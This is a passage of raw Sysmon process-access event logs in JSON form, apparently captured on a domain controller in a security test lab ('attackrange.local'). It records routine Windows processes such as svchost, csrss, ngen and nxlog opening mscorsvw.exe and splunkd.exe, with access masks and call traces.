C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.466","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A9-5F25-0000-0010CA4C1100}","TargetProcessId":"1608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8992,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.669\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-00106FF90F00}\r\nTargetProcessId: 4828\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.669","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-00106FF90F00}","TargetProcessId":"4828","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8993,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.669\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-00106FF90F00}\r\nTargetProcessId: 4828\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.669","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-00106FF90F00}","TargetProcessId":"4828","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8994,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.685\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A9-5F25-0000-001019501100}\r\nTargetProcessId: 4828\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.685","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A9-5F25-0000-001019501100}","TargetProcessId":"4828","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8995,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.701\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.701","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8996,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:06.716\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:06.716","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8997,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:07.732\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:07.732","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8998,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:08.748\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 